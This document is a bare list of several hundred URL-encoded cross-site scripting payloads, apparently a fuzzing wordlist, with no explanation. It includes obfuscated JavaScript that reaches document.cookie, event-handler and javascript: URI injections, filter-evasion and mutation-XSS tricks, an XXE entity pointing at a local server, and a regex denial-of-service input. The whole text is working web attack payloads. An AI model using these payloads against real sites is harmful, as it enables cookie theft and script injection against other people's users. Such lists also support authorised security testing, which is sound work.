window[(+%7B%7D+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
this%22ale%22+(!![]+[])[-~[]]+(!![]+[])[+[]]
this%22ale%22+%22/x72/x74%22
this%22/x61/x6c/x65/x72/x74%22
this'ale'+'/x72/x74'
this'/x61/x6c/x65/x72/x74'
this(+%7B%7D+[])[-[]]+(![]+[])[--[]]+([][+[]]+[])[---[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]
this[(+%7B%7D+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
this[%22document%22][%22cookie%22]
this[%22document%22][%22/x63/x6f/x6f/x6b/x69/x65%22]
this[%22/x64/x6f/x63/x75/x6d/x65/x6e/x74%22][%22cookie%22]
this[%22/x64/x6f/x63/x75/x6d/x65/x6e/x74%22][%22/x63/x6f/x6f/x6b/x69/x65%22]
this[%22document%22][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22kie%22]
this[%22document%22][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22/x6b/x69/x65%22]
this[%22docum%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22/x6b/x69/x65%22]
this[%22docum%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22kie%22]
this[%22docum%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][%22/x63/x6f/x6f/x6b/x69/x65%22]
this[%22docum%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][%22cookie%22]
this[%22/x64/x6f/x63/x75/x6d%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22/x6b/x69/x65%22]
this[%22/x64/x6f/x63/x75/x6d%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22kie%22]
this[%22/x64/x6f/x63/x75/x6d%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][%22/x63/x6f/x6f/x6b/x69/x65%22]
this[%22/x64/x6f/x63/x75/x6d%22+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][%22cookie%22]
this['document']['cookie']
this['document']['/x63/x6f/x6f/x6b/x69/x65']
this['/x64/x6f/x63/x75/x6d/x65/x6e/x74']['cookie']
this['/x64/x6f/x63/x75/x6d/x65/x6e/x74']['/x63/x6f/x6f/x6b/x69/x65']
this['document'][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'kie']
this['document'][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'/x6b/x69/x65']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'/x6b/x69/x65']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'kie']
this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['/x63/x6f/x6f/x6b/x69/x65']
this['/x64/x6f/x63/x75/x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'kie']
this['/x64/x6f/x63/x75/x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['/x63/x6f/x6f/x6b/x69/x65']
this['/x64/x6f/x63/x75/x6d'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]]['cookie']
document[%22cookie%22]
document[%22/x63/x6f/x6f/x6b/x69/x65%22]
document[(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22kie%22]
document[(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+%22/x6b/x69/x65%22]
document['cookie']
document['/x63/x6f/x6f/x6b/x69/x65']
document[(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'kie']
document[(%7B%7D+[])[!+[]+!![]+!![]+!![]+!![]]+(%7B%7D+[])[+!![]]+(%7B%7D+[])[+!![]]+'/x6b/x69/x65']
%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27/x6A/x61/x76/x61/x53/x43/x52/x49/x50/x54/x26/x63/x6F/x6C/x6F/x6E/x3B/x63/x6F/x6E/x66/x69/x72/x6D/x26/x6C/x70/x61/x72/x3B/x64/x6F/x63/x75/x6D/x65/x6E/x74/x2E/x63/x6F/x6F/x6B/x69/x65/x26/x72/x70/x61/x72/x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E
%3Cmeta%20http-equiv=%22X-UA-Compatible%22%20content=%22IE=5%22%3E%3Cp%20style=%22font-family:',;a//22//3e//3cimg//20src//3dx//20onerror//3d//61lert//28//31//29//3e:1'%22%3Eoh-oh%3C/p%3E
%22%3E%3Cmeta%20http-equiv=%22X-UA-Compatible%22%20content=%22IE=5%22%3E%3Cp%20style=%22font-family:',;a//22//3e//3cimg//20src//3dx//20onerror//3d//61lert//28//31//29//3e:1'%22%3Eoh-oh%3C/p%3E
'%3E%3Cmeta%20http-equiv=%22X-UA-Compatible%22%20content=%22IE=5%22%3E%3Cp%20style=%22font-family:',;a//22//3e//3cimg//20src//3dx//20onerror//3d//61lert//28//31//29//3e:1'%22%3Eoh-oh%3C/p%3E
%3Ciframe/onload=action=/confir/.source+'m';eval(action)(1)%3E
%22%3E%3Ciframe/onload=action=/confir/.source+'m';eval(action)(1)%3E
'%3E%3Ciframe/onload=action=/confir/.source+'m';eval(action)(1)%3E
%3C!--[if%20WindowsEdition]%3E%3Cscript%3Econfirm(1);%3C/script%3E%3C![endif]--%3E
%22%3E%3C!--[if%20WindowsEdition]%3E%3Cscript%3Econfirm(1);%3C/script%3E%3C![endif]--%3E
'%3E%3C!--[if%20WindowsEdition]%3E%3Cscript%3Econfirm(1);%3C/script%3E%3C![endif]--%3E
%3Cimg%20src=x%20onerror=confirm(/X/)%3E
%22%3E%3Cimg%20src=x%20onerror=confirm(/X/)%3E
'%3E%3Cimg%20src=x%20onerror=confirm(/X/)%3E
%3Cform/action=ja vascr ipt:confirm(1)%3E%20%3Cbutton/type=submit%3E
%22%3E%3Cform/action=ja vascr ipt:confirm(1)%3E%20%3Cbutton/type=submit%3E
'%3E%3Cform/action=ja vascr ipt:confirm(1)%3E%20%3Cbutton/type=submit%3E
%3Cstyle/onload%20%20%20%20=%20%20%20%20!-alert&
%22%3E%3Cstyle/onload%20%20%20%20=%20%20%20%20!-alert&
'%3E%3Cstyle/onload%20%20%20%20=%20%20%20%20!-alert&
%3Ciframe/name=%22if(0)%7B/u0061lert(1)%7Delse%7B/u0061lert(1)%7D%22/onload=%22eval(name)%22;%3E
%22%3E%3Ciframe/name=%22if(0)%7B/u0061lert(1)%7Delse%7B/u0061lert(1)%7D%22/onload=%22eval(name)%22;%3E
'%3E%3Ciframe/name=%22if(0)%7B/u0061lert(1)%7Delse%7B/u0061lert(1)%7D%22/onload=%22eval(name)%22;%3E
%3Csvg%3E%3C%E2%80%AEGMO=%60%3Cftw=%60skrowtillehehtwoh;%20onload=confirm(location);
%22%3E%3Csvg%3E%3C%E2%80%AEGMO=%60%3Cftw=%60skrowtillehehtwoh;%20onload=confirm(location);
'%3E%3Csvg%3E%3C%E2%80%AEGMO=%60%3Cftw=%60skrowtillehehtwoh;%20onload=confirm(location);
%22%3E%3Cimg%20src=x%20onerror=confirm(1);%3E
%3Cimg/src=x%20alt=confirm(1)%20onerror=eval(alt)%3E
%22%3E%3Cimg/src=x%20alt=confirm(1)%20onerror=eval(alt)%3E
'%3E%3Cimg/src=x%20alt=confirm(1)%20onerror=eval(alt)%3E
%3Cimg%20src=x%20onerror=alert(1)//%3E
%22%3E%3Cimg%20src=x%20onerror=alert(1)//%3E
'%3E%3Cimg%20src=x%20onerror=alert(1)//%3E
%3Csvg%3E%3Cg/onload=alert(1)//
%22%3E%3Csvg%3E%3Cg/onload=alert(1)//
'%3E%3Csvg%3E%3Cg/onload=alert(1)//
%3Ciframe///src=jAva script:alert(1)%3E
%22%3E%3Ciframe///src=jAva script:alert(1)%3E
'%3E%3Ciframe///src=jAva script:alert(1)%3E
%3Cmath%3E%3Cmi//xlink:href=%22data:x,%3Cscript%3Ealert(1)%3C/script%3E
onClick=%22alert('Hello%20/u0022%3E')%22
onload=alert(1)
%22%20onload=alert(1)%20%22
%22%20onload=alert(1)
%20onload=alert(1)%20%22
%22%20onload=alert(1)%20id=%22a
onload%20=alert(1)%20id=%22a
%3Ca%20href='
%22%3E%3Ca%20href='
'%3E%3Ca%20href='
javascript:alert(1)'%3Ea%3C/a%3E
%3Clisting%3E<img%20onerror=%22alert(1);//%22%20src=1>%3Ct%20t%3E%3C/listing%3E
%22%3E%3Clisting%3E<img%20onerror=%22alert(1);//%22%20src=1>%3Ct%20t%3E%3C/listing%3E
'%3E%3Clisting%3E<img%20onerror=%22alert(1);//%22%20src=1>%3Ct%20t%3E%3C/listing%3E
%3Cimg%20src=x%20id/='%20onerror=alert(1)//'%3E
%22%3E%3Cimg%20src=x%20id/='%20onerror=alert(1)//'%3E
'%3E%3Cimg%20src=x%20id/='%20onerror=alert(1)//'%3E
%3Ctextarea%3EX%3C/textarea%3E%3C!--%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(1)%3E--%3E
%22%3E%3Ctextarea%3EX%3C/textarea%3E%3C!--%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(1)%3E--%3E
'%3E%3Ctextarea%3EX%3C/textarea%3E%3C!--%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(1)%3E--%3E
%3Cb%3E%3Cnoscript%3E%3C!--%20%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%20--%3E%3C/noscript%3E
%22%3E%3Cb%3E%3Cnoscript%3E%3C!--%20%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%20--%3E%3C/noscript%3E
'%3E%3Cb%3E%3Cnoscript%3E%3C!--%20%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%20--%3E%3C/noscript%3E
%3Cb%3E%3Cnoscript%3E%3Ca%20alt=%22%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%22%3E%3C/noscript%3E
%22%3E%3Cb%3E%3Cnoscript%3E%3Ca%20alt=%22%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%22%3E%3C/noscript%3E
'%3E%3Cb%3E%3Cnoscript%3E%3Ca%20alt=%22%3C/noscript%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%22%3E%3C/noscript%3E
%3Cbody%3E%3Ctemplate%3E%3Cs%3E%3Ctemplate%3E%3Cs%3E%3Cimg%20src=x%20onerror=alert(1)%3EX%3C/s%3E%3C/template%3E%3C/s%3E%3C/template%3E
%22%3E%3Cbody%3E%3Ctemplate%3E%3Cs%3E%3Ctemplate%3E%3Cs%3E%3Cimg%20src=x%20onerror=alert(1)%3EX%3C/s%3E%3C/template%3E%3C/s%3E%3C/template%3E
'%3E%3Cbody%3E%3Ctemplate%3E%3Cs%3E%3Ctemplate%3E%3Cs%3E%3Cimg%20src=x%20onerror=alert(1)%3EX%3C/s%3E%3C/template%3E%3C/s%3E%3C/template%3E
%3Ca%20href=%22%01java%03script:alert(1)%22%3EX%3Ca%3E
%22%3E%3Ca%20href=%22%01java%03script:alert(1)%22%3EX%3Ca%3E
'%3E%3Ca%20href=%22%01java%03script:alert(1)%22%3EX%3Ca%3E
%01%3Coption%3E%3Cstyle%3E%3C/option%3E%3C/select%3E%3Cb%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%3C/style%3E%3C/option%3E
%3Coption%3E%3Ciframe%3E%3C/select%3E%3Cb%3E%3Cscript%3Ealert(1)%3C/script%3E
'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/iframe%3E%3C/option%3E
%3Cb%3E%3Cstyle%3E%3Cstyle/%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E
%22%3E%3Cb%3E%3Cstyle%3E%3Cstyle/%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E
'%3E%3Cb%3E%3Cstyle%3E%3Cstyle/%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E
%3Cb%3E%3Cstyle%3E%3Cstyle////%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%3C/style%3E
%22%3E%3Cb%3E%3Cstyle%3E%3Cstyle////%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%3C/style%3E
'%3E%3Cb%3E%3Cstyle%3E%3Cstyle////%3E%3Cimg%20src=xx:%20onerror=alert(1)%3E%3C/style%3E
%3Cimage%20name=body%3E%3Cimage%20name=adoptNode%3EX%3Cimage%20name=firstElementChild%3E%3Csvg%20onload=alert(1)%3E
%22%3E%3Cimage%20name=body%3E%3Cimage%20name=adoptNode%3EX%3Cimage%20name=firstElementChild%3E%3Csvg%20onload=alert(1)%3E
'%3E%3Cimage%20name=body%3E%3Cimage%20name=adoptNode%3EX%3Cimage%20name=firstElementChild%3E%3Csvg%20onload=alert(1)%3E
%3Cimage%20name=activeElement%3E%3Csvg%20onload=alert(1)%3E
%22%3E%3Cimage%20name=activeElement%3E%3Csvg%20onload=alert(1)%3E
'%3E%3Cimage%20name=activeElement%3E%3Csvg%20onload=alert(1)%3E
%3Cimage%20name=body%3E%3Cimg%20src=x%3E%3Csvg%20onload=alert(1);%20autofocus%3E,%20%3Ckeygen%20onfocus=alert(1);%20autofocus%3E
%22%3E%3Cimage%20name=body%3E%3Cimg%20src=x%3E%3Csvg%20onload=alert(1);%20autofocus%3E,%20%3Ckeygen%20onfocus=alert(1);%20autofocus%3E
'%3E%3Cimage%20name=body%3E%3Cimg%20src=x%3E%3Csvg%20onload=alert(1);%20autofocus%3E,%20%3Ckeygen%20onfocus=alert(1);%20autofocus%3E
%3Cdiv%20onmouseout=%22javascript:alert(/X/)%22%20x=yscript:%20n%3EX
%22%3E%3Cdiv%20onmouseout=%22javascript:alert(/X/)%22%20x=yscript:%20n%3EX
'%3E%3Cdiv%20onmouseout=%22javascript:alert(/X/)%22%20x=yscript:%20n%3EX
%3Cdiv%20wow=removeme%20onmouseover=alert(1)%3Etext
%22%3E%3Cdiv%20wow=removeme%20onmouseover=alert(1)%3Etext
'%3E%3Cdiv%20wow=removeme%20onmouseover=alert(1)%3Etext
%3Cinput%20x=javascript:%20autofocus%20onfocus=alert(1)%3E%3Csvg%20id=1%20onload=alert(1)%3E%3C/svg%3E
%22%3E%3Cinput%20x=javascript:%20autofocus%20onfocus=alert(1)%3E%3Csvg%20id=1%20onload=alert(1)%3E%3C/svg%3E
'%3E%3Cinput%20x=javascript:%20autofocus%20onfocus=alert(1)%3E%3Csvg%20id=1%20onload=alert(1)%3E%3C/svg%3E
%3Cform%20action=%22javascript:alert(1)%22%3E%3Cbutton%3EX%3C/button%3E%3C/form%3E
%22%3E%3Cform%20action=%22javascript:alert(1)%22%3E%3Cbutton%3EX%3C/button%3E%3C/form%3E
'%3E%3Cform%20action=%22javascript:alert(1)%22%3E%3Cbutton%3EX%3C/button%3E%3C/form%3E
%3Cinput%20onfocus=alert(1)%20autofocus%3E
%22%3E%3Cinput%20onfocus=alert(1)%20autofocus%3E
'%3E%3Cinput%20onfocus=alert(1)%20autofocus%3E
'%3E%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cg%20onload=%22javascript:alert(1)%22%3E%3C/g%3E%3C/svg%3E
%22%3E%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cg%20onload=%22javascript:alert(1)%22%3E%3C/g%3E%3C/svg%3E
%3Cx%20repeat=%22template%22%20repeat-start=%22999999%22%3E0%3Cy%20repeat=%22template%22%20repeat-start=%22999999%22%3E1%3C/y%3E%3C/x%3E
%22%3E%3Cx%20repeat=%22template%22%20repeat-start=%22999999%22%3E0%3Cy%20repeat=%22template%22%20repeat-start=%22999999%22%3E1%3C/y%3E%3C/x%3E
'%3E%3Cx%20repeat=%22template%22%20repeat-start=%22999999%22%3E0%3Cy%20repeat=%22template%22%20repeat-start=%22999999%22%3E1%3C/y%3E%3C/x%3E
%3Cinput%20pattern=%5E((a+.)a)+$%20value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!%3E
%22%3E%3Cinput%20pattern=%5E((a+.)a)+$%20value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!%3E
'%3E%3Cinput%20pattern=%5E((a+.)a)+$%20value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!%3E
%3Cmeta%20charset=%22x-mac-farsi%22%3E%C2%BCscript%20%C2%BEalert(1)//%C2%BC/script%20%C2%BE
%22%3E%3Cmeta%20charset=%22x-mac-farsi%22%3E%C2%BCscript%20%C2%BEalert(1)//%C2%BC/script%20%C2%BE
'%3E%3Cmeta%20charset=%22x-mac-farsi%22%3E%C2%BCscript%20%C2%BEalert(1)//%C2%BC/script%20%C2%BE
%3Cinput%20onblur=focus()%20autofocus%3E%3Cinput%3E
%22%3E%3Cinput%20onblur=focus()%20autofocus%3E%3Cinput%3E
'%3E%3Cinput%20onblur=focus()%20autofocus%3E%3Cinput%3E
%3Cform%20id=test%20onforminput=alert(1)%3E%3Cinput%3E%3C/form%3E%3Cbutton%20form=test%20onformchange=alert(1)%3EX%3C/button%3E
%22%3E%3Cform%20id=test%20onforminput=alert(1)%3E%3Cinput%3E%3C/form%3E%3Cbutton%20form=test%20onformchange=alert(1)%3EX%3C/button%3E
'%3E%3Cform%20id=test%20onforminput=alert(1)%3E%3Cinput%3E%3C/form%3E%3Cbutton%20form=test%20onformchange=alert(1)%3EX%3C/button%3E
1%3Cset/xmlns=%60urn:schemas-microsoft-com:time%60%20style=%60behAvior:url(
%3Clink%20rel=stylesheet%20href=data:,%7bx:expression(alert(1))%7d
%22%3E%3Clink%20rel=stylesheet%20href=data:,%7bx:expression(alert(1))%7d
'%3E%3Clink%20rel=stylesheet%20href=data:,%7bx:expression(alert(1))%7d
%3Cstyle%3E@import%20%22data:,%7bx:expression(alert(1))%7D%22;%3C/style%3E
%22%3E%3Cstyle%3E@import%20%22data:,%7bx:expression(alert(1))%7D%22;%3C/style%3E
'%3E%3Cstyle%3E@import%20%22data:,%7bx:expression(alert(1))%7D%22;%3C/style%3E
%3Ctable%20background=%22javascript:alert(32)%22%3E%3C/table%3E
%22%3E%3Ctable%20background=%22javascript:alert(32)%22%3E%3C/table%3E
'%3E%3Ctable%20background=%22javascript:alert(32)%22%3E%3C/table%3E
%3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22alert(1);%22%3EXXX%3C/a%3E%3C/a%3E%3Ca%20href=%22javascript:alert(1)%22%3EXXX%3C/a%3E
%22%3E%3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22alert(1);%22%3EXXX%3C/a%3E%3C/a%3E%3Ca%20href=%22javascript:alert(1)%22%3EXXX%3C/a%3E
'%3E%3Ca%20style=%22pointer-events:none;position:absolute;%22%3E%3Ca%20style=%22position:absolute;%22%20onclick=%22alert(1);%22%3EXXX%3C/a%3E%3C/a%3E%3Ca%20href=%22javascript:alert(1)%22%3EXXX%3C/a%3E
%3C![%3E%3Cimg%20src=%22]%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E
%22%3E%3C![%3E%3Cimg%20src=%22]%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E
'%3E%3C![%3E%3Cimg%20src=%22]%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E
%3Csvg%3E%3C![CDATA[%3E%3Cimage%20xlink:href=%22]]%3E%3Cimg%20src=xx:x%20onerror=alert(1)//%22%3E%3C/svg%3E
%22%3E%3Csvg%3E%3C![CDATA[%3E%3Cimage%20xlink:href=%22]]%3E%3Cimg%20src=xx:x%20onerror=alert(1)//%22%3E%3C/svg%3E
'%3E%3Csvg%3E%3C![CDATA[%3E%3Cimage%20xlink:href=%22]]%3E%3Cimg%20src=xx:x%20onerror=alert(1)//%22%3E%3C/svg%3E
%3C%3Cstyle%3E%3Cimg%20src=%22%3C/style%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E
%22%3E%3C%3Cstyle%3E%3Cimg%20src=%22%3C/style%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E
'%3E%3C%3Cstyle%3E%3Cimg%20src=%22%3C/style%3E%3Cimg%20src=x%20onerror=alert(1)//%22%3E
%3C%3Cli%20style=list-style:url()%20onerror=alert(1)%3E%3C/li%3E
%22%3E%3C%3Cli%20style=list-style:url()%20onerror=alert(1)%3E%3C/li%3E
'%3E%3C%3Cli%20style=list-style:url()%20onerror=alert(1)%3E%3C/li%3E
%3Cvideo%20onerror=%22alert(1)%22%3E%3Csource%3E%3C/source%3E%3C/video%3E%3C/div%3E
%22%3E%3Cvideo%20onerror=%22alert(1)%22%3E%3Csource%3E%3C/source%3E%3C/video%3E%3C/div%3E
'%3E%3Cvideo%20onerror=%22alert(1)%22%3E%3Csource%3E%3C/source%3E%3C/video%3E%3C/div%3E
'%3E%3Cb%20%3Cscript%3Ealert(1)//%3C/script%3E0%3C/script%3E%3C/b%3E%3C/div%3E
%22%3E%3Cb%20%3Cscript%3Ealert(1)//%3C/script%3E0%3C/script%3E%3C/b%3E%3C/div%3E
'%3E%3Cb%3E%3Cscript%3Cb%3E%3C/b%3E%3Calert(1)%3C/script%20%3C/b%3E%3C/b%3E%3C/div%3E
%22%3E%3Cb%3E%3Cscript%3Cb%3E%3C/b%3E%3Calert(1)%3C/script%20%3C/b%3E%3C/b%3E%3C/div%3E
'%3E%3Cdiv%20id=%22div1%22%3E%3Cinput%20value=%22%60%60onmouseover=alert(1)%22%3E%3C/div%3E%20%3Cdiv%20id=%22div2%22%3E%3C/div%3E%3Cscript%3Edocument.getElementById(%22div2%22).innerHTML%20=%20document.getElementById(%22div1%22).innerHTML;%3C/script%3E%3C/div%3E
%22%3E%3Cdiv%20id=%22div1%22%3E%3Cinput%20value=%22%60%60onmouseover=alert(1)%22%3E%3C/div%3E%20%3Cdiv%20id=%22div2%22%3E%3C/div%3E%3Cscript%3Edocument.getElementById(%22div2%22).innerHTML%20=%20document.getElementById(%22div1%22).innerHTML;%3C/script%3E%3C/div%3E
%3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E
%22%3E%3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E
'%3E%3Cx%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E
%3C!%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E
%22%3E%3C!%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E
'%3E%3C!%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E
%3C?%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E
%22%3E%3C?%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E
'%3E%3C?%20'=%22foo%22%3E%3Cx%20foo='%3E%3Cimg%20src=x%20onerror=alert(1)//'%3E
%3Cdiv%20id=%221%22%3E%3Cembed%20src=%22javascript:alert(1)%22%3E
'%3E%3Cembed%20src=%22javascript:alert(1)%22%3E%3C/embed%3E
'%3E%3Cscript%20src=%22javascript:alert(1)%22%3E%3C/script%3E
%22%3E%3Cscript%20src=%22javascript:alert(1)%22%3E%3C/script%3E
%3C!DOCTYPE%20x[%3C!ENTITY%20x%20SYSTEM%20%22http://127.0.0.1:3555/xss_serve_payloads/X.xxe%22%3E]%3E%3Cy%3E&x;%3C/y%3E
%22%3E%3C!DOCTYPE%20x[%3C!ENTITY%20x%20SYSTEM%20%22http://127.0.0.1:3555/xss_serve_payloads/X.xxe%22%3E]%3E%3Cy%3E&x;%3C/y%3E
'%3E%3C!DOCTYPE%20x[%3C!ENTITY%20x%20SYSTEM%20%22http://127.0.0.1:3555/xss_serve_payloads/X.xxe%22%3E]%3E%3Cy%3E&x;%3C/y%3E
%3C?xml-stylesheet%20type=%22text/xsl%22%20href=%22data:,%3Cxsl:transform%20version='1.0'%20xmlns:xsl='http://www.w3.org/1999/XSL/Transform'%20id='xss'%3E%3Cxsl:output%20method='html'/%3E%3Cxsl:template%20match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E%22?%3E
%22%3E%3C?xml-stylesheet%20type=%22text/xsl%22%20href=%22data:,%3Cxsl:transform%20version='1.0'%20xmlns:xsl='http://www.w3.org/1999/XSL/Transform'%20id='xss'%3E%3Cxsl:output%20method='html'/%3E%3Cxsl:template%20match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E%22?%3E
'%3E%3C?xml-stylesheet%20type=%22text/xsl%22%20href=%22data:,%3Cxsl:transform%20version='1.0'%20xmlns:xsl='http://www.w3.org/1999/XSL/Transform'%20id='xss'%3E%3Cxsl:output%20method='html'/%3E%3Cxsl:template%20match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E%22?%3E
onerror%20CDATA%20%22alert(1)%22
onload%20CDATA%20%22alert(1)%22%3E
%3Chtml:style%20/%3E%3Cx%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22%3EXXX%3C/x%3E
%22%3E%3Chtml:style%20/%3E%3Cx%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22%3EXXX%3C/x%3E
'%3E%3Chtml:style%20/%3E%3Cx%20xlink:href=%22javascript:alert(1)%22%20xlink:type=%22simple%22%3EXXX%3C/x%3E
%3Ccard%20xmlns=%22http://www.wapforum.org/2001/wml%22%3E%3Conevent%20type=%22ontimer%22%3E%3Cgo%20href=%22javascript:alert(1)%22/%3E%3C/onevent%3E%3Ctimer%20value=%221%22/%3E%3C/card%3E
%22%3E%3Ccard%20xmlns=%22http://www.wapforum.org/2001/wml%22%3E%3Conevent%20type=%22ontimer%22%3E%3Cgo%20href=%22javascript:alert(1)%22/%3E%3C/onevent%3E%3Ctimer%20value=%221%22/%3E%3C/card%3E
'%3E%3Ccard%20xmlns=%22http://www.wapforum.org/2001/wml%22%3E%3Conevent%20type=%22ontimer%22%3E%3Cgo%20href=%22javascript:alert(1)%22/%3E%3C/onevent%3E%3Ctimer%20value=%221%22/%3E%3C/card%3E
%3C//%20style=x:expression%028alert(1)%029%3E
%22%3E%3C//%20style=x:expression%028alert(1)%029%3E
'%3E%3C//%20style=x:expression%028alert(1)%029%3E
%3Cevent-source%20src=%22index.php%22%20onload=%22alert(1)%22%3E
%22%3E%3Cevent-source%20src=%22index.php%22%20onload=%22alert(1)%22%3E
'%3E%3Cevent-source%20src=%22index.php%22%20onload=%22alert(1)%22%3E
%3Ca%20href=%22javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A%22%20/%3E%3C/a%3E
%22%3E%3Ca%20href=%22javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A%22%20/%3E%3C/a%3E
'%3E%3Ca%20href=%22javascript:alert(1)%22%3E%3Cevent-source%20src=%22data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A%22%20/%3E%3C/a%3E
%3C?xml-stylesheet%20type=%22text/css%22?%3E%3Croot%20style=%22x:expression(alert(1))%22/%3E
